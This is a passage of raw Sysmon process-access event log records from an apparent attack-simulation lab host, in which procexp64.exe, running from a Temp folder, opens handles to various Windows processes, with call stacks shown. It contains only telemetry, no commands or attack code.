15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784667Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784666Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784665Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784664Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784663Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784662Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784661Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784660Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784659Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784658Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784657Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784656Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784655Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784654Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784653Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784652Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784651Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C: